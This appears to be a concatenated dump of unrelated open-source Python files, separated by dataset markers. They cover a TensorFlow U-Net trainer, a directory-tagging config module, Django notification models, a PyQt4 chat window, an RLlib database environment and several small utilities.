    phase = math.pi * cur_epoch / n_epochs
    return 0.5 * learn_rate * (1 + math.cos(phase))
if __name__ == "__main__":
if not os.path.exists(log_path):
os.makedirs(log_path)
if not os.path.exists(ckpt_path):
os.mkdir(ckpt_path)
print("Params Config:\n")
print("Learning Rate: %f" % init_learning_rate)
print(" Optimizer: Adam")
print(" Batch Size: %d " % batch_size)
print(" Train Epochs: %d " % total_epochs)
# rename pic for underwater image and ground truth image
# BatchRename(image_path=trainA_path).rename()
# BatchRename(image_path=trainB_path).rename()
# underwater image
image_u = tf.placeholder(dtype=tf.float32, shape=[None, 256, 256, 3], name='image_u')
# correct image
image_r = tf.placeholder(dtype=tf.float32, shape=[None, 256, 256, 3], name='image_r')
training_flag = tf.placeholder(tf.bool)
learning_rate = tf.placeholder(tf.float32, shape=[], name='learning_rate')
lr_sum = tf.summary.scalar('lr', learning_rate)
# generated color image by u-net
U_NET = UNet(input_=image_u, real_=image_r, is_training=training_flag)
gen_image = U_NET.u_net(inputs=image_u, training=training_flag)
G_sum = tf.summary.image("gen_image", gen_image, max_outputs=10)
# loss of u-net
errG = U_NET.l1_loss(gt=image_r, gen=gen_image)
# errG = U_NET.mse_loss(gt=image_r, gen=gen_image)
# errG = U_NET.ssim_loss(gt=image_r, gen=gen_image)
# errG = U_NET.msssim_loss(gt=image_r, gen=gen_image)
# errG = U_NET.gdl_loss(gt=image_r, gen=gen_image)
# errG = U_NET.l2_l1_loss(gt=image_r, gen=gen_image, alpha=0.8)
# errG = U_NET.ssim_l1_loss(gt=image_r, gen=gen_image, alpha=0.8)
# errG = U_NET.msssim_l1_loss(gt=image_r, gen=gen_image, alpha=0.8)
# errG = U_NET.gdl_l1_loss(gt=image_r, gen=gen_image, alpha=0.8)
errG_sum = tf.summary.scalar("loss", errG)
t_var = tf.trainable_variables()
g_vars = [var for var in t_var]
# if consider l2 regularization
# l2_loss = tf.add_n([tf.nn.l2_loss(var) for var in t_var])
# optimizer
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=nesterov_momentum, use_nesterov=True)
# train_op = optimizer.minimize(errG + l2_loss * weight_decay)
train_op = optimizer.minimize(loss=errG)
# TensorBoard Summaries
# tf.summary.scalar('batch_loss', tf.reduce_mean(errG))
# tf.summary.scalar('learning_rate', learning_rate)
# try:
# tf.summary.scalar('l2_loss', tf.reduce_mean(l2_loss))
# except: pass
# saver = tf.train.Saver(tf.global_variables())
config = tf.ConfigProto()
# restrict model GPU memory utilization to min required
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
ckpt = tf.train.get_checkpoint_state(ckpt_path)
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
U_NET.restore(sess=sess, model_path=ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
all_sum = tf.summary.merge([G_sum, errG_sum, lr_sum])
train_summary_writer = tf.summary.FileWriter(log_path, sess.graph)
# merged_summary_op = tf.summary.merge_all()
# load data
# trainA_paths for underwater image
# trainB_paths for ground truth image
img_process = ImageProcess(pathA=trainA_path + '*.png',
pathB=trainB_path + '*.png',
batch_size=batch_size,
is_aug=False)
counter = 1
trainA_paths, trainB_paths = img_process.load_data()
for epoch in range(1, total_epochs+1):
# epoch_learning_rate = cosine_learning_rate(learn_rate=init_learning_rate,
# n_epochs=total_epochs,
# cur_epoch=epoch)
epoch_learning_rate = init_learning_rate
# total_loss = []
start_time = time.time()
for step in range(1, int(len(trainA_paths)/batch_size)):
batchA_images, batchB_images = img_process.shuffle_data(trainA_paths, trainB_paths)
train_feed_dict = {
image_u: batchA_images,
image_r: batchB_images,
learning_rate: epoch_learning_rate,
training_flag: True
}
_, summary_str = sess.run([train_op, all_sum], feed_dict=train_feed_dict)
train_summary_writer.add_summary(summary=summary_str, global_step=counter)
# batch_loss = sess.run(errG, feed_dict=train_feed_dict)
# total_loss.append(batch_loss)
counter += 1
end_time = time.time()
# train_loss = np.mean(total_loss)
line = "epoch: %d/%d, time cost: %.4f\n" % (epoch, total_epochs, float(end_time - start_time))
# line = "epoch: %d/%d, train loss: %.4f, time cost: %.4f\n" % (epoch, total_epochs, float(train_loss), float(end_time - start_time))
print(line)
if epoch % 10 == 0:
U_NET.save(sess=sess, model_path=ckpt_path + str(epoch)+'u_net.ckpt')
| StarcoderdataPython |
5064315 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Vim:fenc=utf-8
#
# Copyright © 2018 <NAME> <<EMAIL>>
#
# Distributed under terms of the MIT license.
"""Ensure the example files are valid."""
from pathlib import Path
import pytest
from click.testing import CliRunner
from experi.run import main
@pytest.fixture
def runner():
    # A fresh Click CLI runner per test keeps invocations isolated.
    yield CliRunner()
def example_files():
    """Yield the path of every example YAML file, as a string."""
    yield from (str(path) for path in Path("examples").glob("*.yml"))
@pytest.mark.parametrize("filename", example_files())
def test_examples(runner, filename):
    # Each example file must exist and be accepted by the CLI in dry-run mode.
    assert Path(filename).is_file()
    result = runner.invoke(main, ["--dry-run", "--input-file", filename])
    assert result.exit_code == 0, result.output
| StarcoderdataPython |
3467453 | import json
from pathlib import Path
from typing import Dict, Set
from dtags.commons import normalize_tags
from dtags.exceptions import DtagsError
CONFIG_ROOT = ".dtags"  # per-user config directory under $HOME
CONFIG_FILE = "config.json"  # main tag configuration file
COMP_FILE = "completion"  # used for tag name completion
DEST_FILE = "destination"  # used for d command
# Parsed config shape: {"tags": {directory Path: set of tag names}}
ConfigType = Dict[str, Dict[Path, Set[str]]]
def get_file_path(filename: str) -> Path:
    """Return the absolute path of *filename* inside the dtags config root."""
    return Path.home().joinpath(CONFIG_ROOT, filename)
def get_new_config() -> ConfigType:
    """Build a blank configuration: a "tags" mapping with no entries."""
    blank = {"tags": {}}
    return blank
def load_config_file() -> ConfigType:
    """Load and normalize the dtags JSON config.

    On first use (file missing) a fresh empty config is persisted and
    returned.  Directory keys are converted to ``Path`` objects and tag
    lists are normalized into sets via ``normalize_tags``.
    Raises DtagsError when the file contains invalid JSON.
    """
    config_file_path = get_file_path(CONFIG_FILE)
    try:
        with open(config_file_path, "r") as fp:
            config_data = json.load(fp)
    except FileNotFoundError:
        # First run: create, persist and return an empty configuration.
        new_data = get_new_config()
        save_config_file(new_data)
        return new_data
    except ValueError as err: # pragma no cover
        raise DtagsError(f"Bad data in {config_file_path.as_posix()}: {err}")
    else:
        tag_config = config_data["tags"]
        return {
            "tags": {
                Path(dirpath): normalize_tags(tags)
                for dirpath, tags in tag_config.items()
            }
        }
def save_config_file(config: ConfigType) -> None:
    """Serialize *config* to the JSON config file and refresh completion data.

    Paths become POSIX strings, tag sets become sorted lists, and
    directories with no tags are dropped.  The config directory is created
    on demand with mode 0o755.
    """
    config_file_path = get_file_path(CONFIG_FILE)
    config_file_path.parent.mkdir(mode=0o755, exist_ok=True)
    config_data = {
        "tags": {
            dirpath.as_posix(): sorted(tags)
            for dirpath, tags in config["tags"].items()
            if len(tags) > 0
        }
    }
    with open(config_file_path, "w") as fp:
        json.dump(config_data, fp, sort_keys=True, indent=2)
    # Keep the shell-completion word list in sync with the saved config.
    save_completion_file(config)
def save_completion_file(config: ConfigType) -> None:
    """Dump every tag in use, space-separated, for shell tab-completion."""
    tag_pool: Set[str] = set()
    for tag_group in config["tags"].values():
        tag_pool.update(tag_group)
    with open(get_file_path(COMP_FILE), "w") as fp:
        fp.write(" ".join(tag_pool))
def save_destination_file(dirpath: Path) -> None:
    """Persist *dirpath* so the `d` jump command knows where to go."""
    destination = get_file_path(DEST_FILE)
    with open(destination, "w") as fp:
        fp.write(dirpath.as_posix())
| StarcoderdataPython |
8108459 | <reponame>metakirby5/jisho-to-anki<gh_stars>0
# -*- coding: utf-8 -*-
"""
Configuration values.
"""
import json
class Config:
    """Typed accessor over the add-on's JSON configuration file object."""

    def __init__(self, fp):
        cfg = json.load(fp)

        # Anki connection settings.
        self.profile: str = cfg['profile']
        self.note: str = cfg['note']
        self.deck: str = cfg['deck']
        self.tags: str = cfg['tags']

        # Field indices are stored as strings and mapped to 'fld<N>' names.
        field_map = cfg['fields']
        self.meaning_field: str = 'fld' + field_map['meaning']
        self.reading_field: str = 'fld' + field_map['reading']
        self.word_field: str = 'fld' + field_map['word']
8109779 | # coding:utf-8
from django.db import models
from django.contrib.auth.models import User
from django.utils.html import escape
class Activity(models.Model):
    """A single user action (favorite / like / up-vote / down-vote) recorded
    against a feed, question or answer.

    NOTE(review): the targets are stored as plain integer ids rather than
    foreign keys -- referential integrity is not enforced by the database.
    """
    FAVORITE = 'F'
    LIKE = 'L'
    UP_VOTE = 'U'
    DOWN_VOTE = 'D'
    ACTIVITY_TYPES = (
        (FAVORITE, 'Favorite'),
        (LIKE, 'Like'),
        (UP_VOTE, 'Up Vote'),
        (DOWN_VOTE, 'Down Vote'),
    )
    user = models.ForeignKey(User)
    activity_type = models.CharField(max_length=1, choices=ACTIVITY_TYPES)
    date = models.DateTimeField(auto_now_add=True)
    # Integer ids of the targeted objects; only one of these is set per row.
    feed = models.IntegerField(null=True, blank=True)
    question = models.IntegerField(null=True, blank=True)
    answer = models.IntegerField(null=True, blank=True)
    class Meta:
        verbose_name = 'Activity'
        verbose_name_plural = 'Activities'
    def __unicode__(self):
        return self.activity_type
    # Disabled reputation hook, kept for reference.
    # def save(self, *args, **kwargs):
    #     super(Activity, self).save(*args, **kwargs)
    #     if self.activity_type == Activity.FAVORITE:
    #         Question = models.get_model('questions', 'Question')
    #         question = Question.objects.get(pk=self.question)
    #         user = question.user
    #         user.profile.reputation = user.profile.reputation + 5
    #         user.save()
class Notification(models.Model):
    """User-to-user notification with per-type HTML rendering templates.

    __unicode__ renders the notification as an HTML snippet that links to a
    "mark as read" endpoint and then redirects to the target object.

    NOTE(review): several template URLs contain the character sequence
    "site¬ification_id" -- this looks like HTML-entity mojibake of
    "site&notification_id" (the "&not" was decoded to "¬"); confirm against
    the upstream repository before relying on these links.
    """
    LIKED = 'L'
    COMMENTED = 'C'
    FAVORITED = 'F'
    ANSWERED = 'A'
    ACCEPTED_ANSWER = 'W'
    EDITED_ARTICLE = 'E'
    ALSO_COMMENTED = 'S'
    NOTIFICATION_TYPES = (
        (LIKED, 'Liked'),
        (COMMENTED, 'Commented'),
        (FAVORITED, 'Favorited'),
        (ANSWERED, 'Answered'),
        (ACCEPTED_ANSWER, 'Accepted Answer'),
        (EDITED_ARTICLE, 'Edited Article'),
        (ALSO_COMMENTED, 'Also Commented'),
    )
    # Old template versions are kept commented out for reference.
    # _LIKED_TEMPLATE = u'<a href="/{0}/"><div class="user"><img src="{1}" class="user-picture">{2}</a> 赞了你的帖:</div>' \
    #                   u'<span class="label label-info"><a style="border-top: 0px" href="/feeds/{3}/">' \
    #                   u'<i class="menu-icon fa fa-list-alt"></i>{4}</a></span>'
    _LIKED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/feeds/{1}/">' \
                     u'<div class="clearfix"> ' \
                     u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
                     u'<div class="clearfix"><span class="pull-right">赞了: {4}</span></div>' \
                     u'</div> '
    # _COMMENTED_TEMPLATE = u'<a href="/{0}/">{1}</a> 评论了你的帖: ' \
    #                       u'<a style="border-top: 0px" href="/feeds/{2}/">{3}</a>'
    _COMMENTED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/feeds/{1}/">' \
                         u'<div class="clearfix"> ' \
                         u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
                         u'<div class="clearfix"><span class="pull-right">评论了: {4}</span></div>' \
                         u'</div> '
    # _FAVORITED_TEMPLATE = u'<a href="/{0}/">{1}</a>关注了你的问题: ' \
    #                       u'<a style="border-top: 0px" href="/questions/{2}/">{3}</a>'
    _FAVORITED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/questions/{1}/">' \
                         u'<div class="clearfix"> ' \
                         u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
                         u'<div class="clearfix"><span class="pull-right">关注: {4}</span></div>' \
                         u'</div> '
    # _ANSWERED_TEMPLATE = u'<a href="/{0}/">{1}</a> 回答了你的问题: ' \
    #                      u'<a style="border-top: 0px" href="/questions/{2}/">{3}</a>'
    _ANSWERED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/questions/{1}/">' \
                        u'<div class="clearfix"> ' \
                        u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
                        u'<div class="clearfix"><span class="pull-right">回答: {4}</span></div>' \
                        u'</div> '
    # _ACCEPTED_ANSWER_TEMPLATE = u'<a href="/{0}/">{1}</a> 接受了你的答案: ' \
    #                             u'<a style="border-top: 0px" href="/questions/{2}/">{3}</a>'
    _ACCEPTED_ANSWER_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/questions/{1}/">' \
                               u'<div class="clearfix"> ' \
                               u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
                               u'<div class="clearfix"><span class="pull-right">接受答案: {4}</span></div>' \
                               u'</div> '
    # _EDITED_ARTICLE_TEMPLATE = u'<a href="/{0}/">{1}</a> 编辑了你的文章: ' \
    #                            u'<a style="border-top: 0px" href="/article/{2}/">{3}</a>'
    _EDITED_ARTICLE_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/article/{1}/">' \
                              u'<div class="clearfix"> ' \
                              u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
                              u'<div class="clearfix"><span class="pull-right">编辑: {4}</span></div>' \
                              u'</div> '
    # _ALSO_COMMENTED_TEMPLATE = u'<a href="/{0}/">{1}</a> 也评论了贴: ' \
    #                            u'<a style="border-top: 0px" href="/feeds/{2}/">{3}</a>'
    _ALSO_COMMENTED_TEMPLATE= u'<a href="/notification/read?notification_type=site¬ification_id={0}&next=/feeds/{1}/">' \
                              u'<div class="clearfix"> ' \
                              u'<span class="pull-left "><div class="user"><img src="{2}" class="notification-user-picture"></div>{3}</span>' \
                              u'<div class="clearfix"><span class="pull-right">也评论: {4}</span></div>' \
                              u'</div> '
    from_user = models.ForeignKey(User, related_name='+')
    to_user = models.ForeignKey(User, related_name='+')
    date = models.DateTimeField(auto_now_add=True)
    # Target objects; exactly one is expected to be set depending on the type.
    feed = models.ForeignKey('feeds.Feed', null=True, blank=True)
    question = models.ForeignKey('questions.Question', null=True, blank=True)
    answer = models.ForeignKey('questions.Answer', null=True, blank=True)
    article = models.ForeignKey('articles.Article', null=True, blank=True)
    notification_type = models.CharField(max_length=1, choices=NOTIFICATION_TYPES)
    is_read = models.BooleanField(default=False)
    class Meta:
        verbose_name = 'Notification'
        verbose_name_plural = 'Notifications'
        ordering = ('-date',)
    def __unicode__(self):
        # Render the notification as an HTML fragment; each branch formats
        # the template matching the notification type.
        if self.notification_type == self.LIKED:
            return self._LIKED_TEMPLATE.format(
                self.pk,
                self.feed.pk,
                escape(self.from_user.profile.get_picture()),
                # escape(self.from_user.username),
                escape(self.from_user.profile.get_screen_name()),
                escape(self.get_summary(self.feed.post)),
            )
        elif self.notification_type == self.COMMENTED:
            return self._COMMENTED_TEMPLATE.format(
                self.pk,
                self.feed.pk,
                escape(self.from_user.profile.get_picture()),
                # escape(self.from_user.username),
                escape(self.from_user.profile.get_screen_name()),
                escape(self.get_summary(self.feed.post))
            )
        elif self.notification_type == self.FAVORITED:
            return self._FAVORITED_TEMPLATE.format(
                self.pk,
                self.question.pk,
                # escape(self.from_user.username),
                escape(self.from_user.profile.get_picture()),
                escape(self.from_user.profile.get_screen_name()),
                escape(self.get_summary(self.question.title))
            )
        elif self.notification_type == self.ANSWERED:
            return self._ANSWERED_TEMPLATE.format(
                self.pk,
                self.question.pk,
                # escape(self.from_user.username),
                escape(self.from_user.profile.get_picture()),
                escape(self.from_user.profile.get_screen_name()),
                escape(self.get_summary(self.question.title))
            )
        elif self.notification_type == self.ACCEPTED_ANSWER:
            return self._ACCEPTED_ANSWER_TEMPLATE.format(
                self.pk,
                self.answer.question.pk,
                # escape(self.from_user.username),
                escape(self.from_user.profile.get_picture()),
                escape(self.from_user.profile.get_screen_name()),
                escape(self.get_summary(self.answer.description))
            )
        elif self.notification_type == self.EDITED_ARTICLE:
            return self._EDITED_ARTICLE_TEMPLATE.format(
                self.pk,
                self.article.slug,
                # escape(self.from_user.username),
                escape(self.from_user.profile.get_picture()),
                escape(self.from_user.profile.get_screen_name()),
                escape(self.get_summary(self.article.title))
            )
        elif self.notification_type == self.ALSO_COMMENTED:
            return self._ALSO_COMMENTED_TEMPLATE.format(
                self.pk,
                # escape(self.from_user.username),
                escape(self.from_user.profile.get_picture()),
                escape(self.from_user.profile.get_screen_name()),
                escape(self.get_summary(self.feed.post))
            )
        else:
            return 'Ooops! Something went wrong.'
    def get_summary(self, value):
        # Truncate long payloads to a short preview with an ellipsis.
        summary_size = 7
        if len(value) > summary_size:
            return u'{0}...'.format(value[:summary_size])
        else:
            return value
# App-side Activity: collects and aggregates user participation behaviour,
# e.g. "liking" a dish.
class AppActivity(models.Model):
    """Generic record of a user's participation in an app module."""
    ASSET = 'A'
    ACTIVITY_TYPES = (
        (ASSET, u'资产管理'),
    )
    user = models.ForeignKey(User)
    activity_type = models.CharField(max_length=1, choices=ACTIVITY_TYPES)
    date = models.DateTimeField(auto_now_add=True)
    class Meta:
        verbose_name = 'AppActivity'
        verbose_name_plural = 'AppActivities'
    def __unicode__(self):
        return self.activity_type
# App Notification: a generalized notification model, so new app modules can
# be added without changing the table structure.
class AppNotification(models.Model):
    """Per-app notification with app-specific icon and rendering templates.

    NOTE(review): RETURN_IN_NAVBAR_TEMPLATE's URL is built from `content`
    and `to_do_reference_url`; verify the values are escaped upstream, since
    only some of them pass through escape() in __unicode__.
    """
    # Registered app modules (currently only asset management).
    # asset
    ASSET = 'AM'
    APPS_ICO = {
        ASSET: 'fa-eye'
    }
    APPS_NAME_DICT = {
        ASSET: u'资产管理'
    }
    RETURN_IN_NAVBAR_TEMPLATE = {
        ASSET: u'<a href="/notification/read?notification_type=app¬ification_id={0}&next={1}">'
               u'<div class="clearfix"><span class="pull-left">'
               u'<i class="btn btn-xs no-hover btn-pink fa {2}"></i> <b>{3}</b> </span>'
               u'<span class="pull-right"> {4} </span></div> ',
    }
    RETURN_IN_ALL_TEMPLATE = {
        ASSET: u'',
    }
    APPS_NAME_TUPLE = tuple(APPS_NAME_DICT.items())
    from_user = models.ForeignKey(User, related_name='+')
    to_user = models.ForeignKey(User, related_name='+')
    from_app = models.CharField(max_length=3, choices=APPS_NAME_TUPLE)
    content = models.CharField(max_length=32)
    to_do_reference_url = models.CharField(max_length=2048)
    is_read = models.BooleanField(default=False)
    date = models.DateTimeField(auto_now_add=True)
    class Meta:
        verbose_name = 'AppNotification'
        verbose_name_plural = 'AppNotification'
        ordering = ('-date',)
    def __unicode__(self):
        # Render using the template registered for the originating app.
        for app in self.APPS_NAME_TUPLE:
            app_name_flag = app[0]
            if self.from_app == app_name_flag:
                return self.RETURN_IN_NAVBAR_TEMPLATE[app_name_flag].format(
                    self.pk,
                    escape(self.to_do_reference_url),
                    escape(self.APPS_ICO[app_name_flag]),
                    escape(self.APPS_NAME_DICT[app_name_flag]),
                    escape(self.content)
                )
        return 'Ooops! Something went wrong.'
    def get_ico(self):
        # Font Awesome icon class for this notification's app.
        return self.APPS_ICO[self.from_app]
def get_app_name(self):
return self.APPS_NAME_DICT[self.from_app] | StarcoderdataPython |
5198397 | <filename>setup.py<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import find_packages, setup
# Version is sourced from the package itself so releases stay in sync.
from ml import __version__
setup(
    name='ml',
    version=__version__,
    license='PRIVATE',
    author='',
    author_email='',
    description='robin know everything',
    url='<EMAIL>:Fydot/ml.git',
    packages=find_packages(exclude=['tests']),
    package_data={'ml': ['CHANGES.rst', 'README.md']},
    zip_safe=False,
    install_requires=[
        'numpy',
        'scikit-learn',
    ],
    entry_points={
        'console_scripts': [],
    }
)
| StarcoderdataPython |
5123162 | from voronoi import Voronoi, Polygon
# Define a set of points
points = [
    (2.5, 2.5),
    (4, 7.5),
    (7.5, 2.5),
    (6, 7.5),
    (4, 4),
    (3, 3),
    (6, 3),
]
# Define a bounding box (convex polygon that clips the diagram)
polygon = Polygon([
    (2.5, 10),
    (5, 10),
    (10, 5),
    (10, 2.5),
    (5, 0),
    (2.5, 0),
    (0, 2.5),
    (0, 5),
])
# Initialize the algorithm
v = Voronoi(polygon)
# Create the diagram (visualization of intermediate steps disabled)
v.create_diagram(points=points, vis_steps=False, verbose=False, vis_result=True, vis_tree=True)
# Get properties of the finished diagram
edges = v.edges
vertices = v.vertices
arcs = v.arcs
points = v.points
# Calculate the cell size for each point
for point in v.points:
    print(f"{(point.x, point.y)} \t {point.cell_size()}")
# for point in v.points:
#     print([(round(p.x, 2), round(p.y, 2)) for p in point.get_coordinates()])
print(v.points[0].get_coordinates()) | StarcoderdataPython |
5098960 | import sys
from PyQt4 import QtCore, QtGui
from ui.ui_chat import Ui_chatWindow
class ChatWindow(QtGui.QWidget, Ui_chatWindow):
    """Tabbed chat window (PyQt4, Python 2).

    Each conversation lives in one tab of `convTab`; the tab's user data
    holds the contact URI.  Keyboard shortcuts: Enter sends, Esc closes the
    current tab (with confirmation if there is unsent input), Ctrl+1..9
    jumps to a tab, Ctrl+[/] cycles tabs.
    """
    def __init__(self):
        QtGui.QWidget.__init__(self)
        self.setupUi(self)
        self.chat_view = self.chatHistoryTextEdit
        # Start with no conversations; tabs are created on demand.
        self.convTab.clear()
        self.convTab.setDocumentMode(True)
        self.convTab.currentChanged.connect(self.current_tab_changed)
        self.convTab.tabBar().tabCloseRequested.connect(self.tab_close_requested)
    def add_tab(self, contact_uri):
        # Open (and focus) a new conversation tab for `contact_uri`.
        # The special URI '10000' denotes system messages.
        if self.isHidden():
            self.show()
        if contact_uri == '10000':
            label = "sys info"
        else:
            label = contact_uri
        chat_input = QtGui.QTextEdit()
        new_idx = self.convTab.addTab(chat_input, QtCore.QString(label))
        self.convTab.setCurrentIndex(new_idx)
        # Stash the contact URI in the tab's user data for later lookup.
        tabbar = self.convTab.tabBar()
        tabbar.setTabData(new_idx, contact_uri)
        #self.convTab.tabBar().setTabData(new_idx, contact_uri)
        #self.focus_on_current_chat_tab()
        self.convTab.setTabBar(tabbar)
        self.contactNameLabel.setText(label)
    def current_tab_changed(self, idx):
        # Keep the contact-name label in sync with the selected tab.
        print("current_tab_changed")
        print("current idx: %d" % idx)
        NO_TAB = -1
        if idx == NO_TAB:
            return
        tabbar = self.convTab.tabBar()
        display_name = tabbar.tabText(idx)
        self.contactNameLabel.setText(display_name)
        contact_uri = tabbar.tabData(idx)
        print "type:", contact_uri
        print "contact_uri:", contact_uri.toString()
    def tab_close_requested(self, idx):
        # Close the tab, asking for confirmation when there is unsent input;
        # hide the window once the last tab is gone.
        no_input = self.convTab.widget(idx).toPlainText()
        if not no_input:
            self.convTab.removeTab(idx)
        else:
            msg = "Pressing the ESC key will close this conversation. <br />" \
                  "Are you sure you want to continue ?"
            if popup_confirm(self, msg):
                self.convTab.removeTab(idx)
        if not self.convTab.count():
            self.hide()
    def _close_current_tab(self):
        # Remove the active tab; hide the window when none remain.
        self.convTab.removeTab(self.convTab.currentIndex())
        if not self.convTab.count():
            self.hide()
    def go_to_tab_by_uri(self, contact_uri):
        # Activate the existing tab for `contact_uri`; return False if absent.
        for idx in xrange(self.convTab.count()):
            tab_uri = str(self.convTab.tabBar().tabData(idx).toString())
            if tab_uri == contact_uri:
                print("go to existed chat tab")
                self.convTab.setCurrentIndex(idx)
                self.focus_on_current_chat_tab()
                return True
        return False
    def keyPressEvent(self, event):
        # Central keyboard dispatcher for all chat shortcuts (see class doc).
        key = event.key()
        is_goto_prev_tab = (event.modifiers() == QtCore.Qt.ControlModifier) and (key == QtCore.Qt.Key_BracketLeft)
        is_goto_next_tab = (event.modifiers() == QtCore.Qt.ControlModifier) and (key == QtCore.Qt.Key_BracketRight)
        is_send_msg = key == QtCore.Qt.Key_Return
        is_close_tab = key == QtCore.Qt.Key_Escape
        is_switch_tab = (event.modifiers() == QtCore.Qt.ControlModifier) and (key >= QtCore.Qt.Key_1 and key <= QtCore.Qt.Key_9)
        # Key_1..Key_9 are the ASCII digit codes, so subtracting '0' (48)
        # yields the tab number.
        CHAR_START_AT = 48
        if is_close_tab:
            if not self.convTab.count():
                self.hide()
                return
            no_input = self.convTab.currentWidget().toPlainText()
            if not no_input:
                self._close_current_tab()
            else:
                msg = "Pressing the ESC key will close this conversation. <br />" \
                      "Are you sure you want to continue ?"
                if popup_confirm(self, msg):
                    self._close_current_tab()
        elif is_send_msg:
            widget = self.convTab.currentWidget()
            if not widget:
                return
            msg = widget.toPlainText()
            if not msg:
                return
            widget.clear()
            # NOTE(review): only prints 'send' -- actual message delivery is
            # presumably wired elsewhere; confirm.
            print 'send'
        elif is_switch_tab:
            count = self.convTab.count()
            k = key.real - CHAR_START_AT
            if 1 > k and k > 9:
                return
            if k < count + 1:
                self.convTab.setCurrentIndex(k - 1)
        elif is_goto_prev_tab:
            # Ctrl+[ : cycle to the previous tab, wrapping around.
            count = self.convTab.count()
            cur_idx = self.convTab.currentIndex()
            if count == 1:
                return
            elif cur_idx == 0:
                self.convTab.setCurrentIndex(count - 1)
            else:
                self.convTab.setCurrentIndex(cur_idx - 1)
        elif is_goto_next_tab:
            # Ctrl+] : cycle to the next tab, wrapping around.
            count = self.convTab.count()
            cur_idx = self.convTab.currentIndex()
            if count == 1:
                return
            elif (count - 1) == cur_idx:
                self.convTab.setCurrentIndex(0)
            else:
                self.convTab.setCurrentIndex(cur_idx + 1)
self.convTab.setCurrentIndex(cur_idx + 1)
class Main(QtGui.QWidget):
    """Tiny manual test harness: buttons to show the chat window and to
    add/remove conversation tabs."""

    def __init__(self):
        QtGui.QWidget.__init__(self, parent=None)
        self.setGeometry(500, 200, 300, 400)

        self.chat_win = ChatWindow()
        self.chat_win.show()

        self.btn = QtGui.QPushButton(self)
        self.btn.clicked.connect(self.show_tab)
        self.add_btn = QtGui.QPushButton('add', self)
        self.add_btn.clicked.connect(self.add_tab)
        self.del_btn = QtGui.QPushButton('del', self)
        self.del_btn.clicked.connect(self.del_tab)

        layout = QtGui.QHBoxLayout()
        for button in (self.btn, self.add_btn, self.del_btn):
            layout.addWidget(button)
        self.setLayout(layout)

        self.show()
        self.c = 1  # next auto-generated contact URI

    def add_tab(self):
        """Open a new chat tab with an auto-incremented fake URI."""
        self.chat_win.add_tab(str(self.c))
        self.c += 1

    def del_tab(self):
        # Not implemented in this harness.
        pass

    def show_tab(self):
        """Re-show the chat window if it was hidden."""
        self.chat_win.show()
def main():
    """Spin up the Qt event loop with the demo harness window."""
    app = QtGui.QApplication(sys.argv)
    window = Main()  # renamed: the original local shadowed this function
    sys.exit(app.exec_())


if __name__ == "__main__":
    main()
| StarcoderdataPython |
4918838 | <reponame>simplerick/sqlopt
import numpy as np
from gym.spaces import Box, Dict, Discrete
from database_env.foop import DataBaseEnv_FOOP
from database_env.query_encoding import DataBaseEnv_QueryEncoding
class DataBaseEnv_FOOP_QueryEncoding(DataBaseEnv_FOOP, DataBaseEnv_QueryEncoding):
    """
    Database environment with states and actions as in the article (https://arxiv.org/pdf/1911.11689.pdf)
    and encoding like NEO (http://www.vldb.org/pvldb/vol12/p1705-marcus.pdf).
    Suitable for use with RLlib.

    Attributes:
        env_config(dict): Algorithm-specific configuration data, should contain item corresponding to the DB scheme.
    """
    def __init__(self, env_config, is_join_graph_encoding=False):
        super().__init__(env_config)
        self.is_join_graph_encoding = is_join_graph_encoding
        # Flattened FOOP matrix (N_rels x N_cols) plus the predicate one-hot,
        # optionally extended with the join-graph query encoding.
        real_obs_shape = self.N_rels * self.N_cols + self.N_cols
        if self.is_join_graph_encoding:
            real_obs_shape += self.query_encoding_size
        real_obs_shape = (real_obs_shape, )
        # BUG FIX: the deprecated alias np.int was removed in NumPy 1.24;
        # it was a plain alias of the builtin int, which is the documented
        # replacement, so behavior is unchanged.
        self.observation_space = Dict({
            'real_obs': Box(low = 0, high = 1, shape = real_obs_shape, dtype = int),
            'action_mask': Box(low = 0, high = 1, shape = (len(self.actions), ), dtype = int),
        })

    def get_obs(self):
        """Return the current observation as plain lists (RLlib-friendly)."""
        real_obs = [self.get_foop().flatten()]
        if self.is_join_graph_encoding:
            real_obs.append(self.join_graph_encoding)
        real_obs.append(self.predicate_ohe)
        real_obs = np.concatenate(real_obs).astype(int)
        return {
            'real_obs': real_obs.tolist(),
            'action_mask': self.valid_actions().astype(int).tolist()
        }
| StarcoderdataPython |
3490074 | <reponame>NarrativeScience/sfn-workflow-client
"""Contains a client for interacting with a workflow"""
import boto3
from .config import AWS_ACCOUNT_ID, STEPFUNCTIONS_ENDPOINT_URL
from .execution import ExecutionCollection
class Workflow:
    """Thin wrapper around boto3's Step Functions client for one state machine.

    Acts mainly as a conduit to executions, e.g.::

        workflow = Workflow("my-state-machine")
        collection = await workflow.executions.fetch()
        collection = await workflow.executions.fetch(status=ExecutionStatus.running)
        execution = await workflow.executions.create().start()
        execution = await workflow.executions.start_sync()
        execution = await workflow.executions.fetch().find_by_trace_id("abc")
        events = await execution.events.fetch()
    """

    def __init__(
        self, name: str, stepfunctions_endpoint_url: str = STEPFUNCTIONS_ENDPOINT_URL
    ) -> None:
        """
        Args:
            name: Workflow (state machine) name to be used to query AWS Step Functions
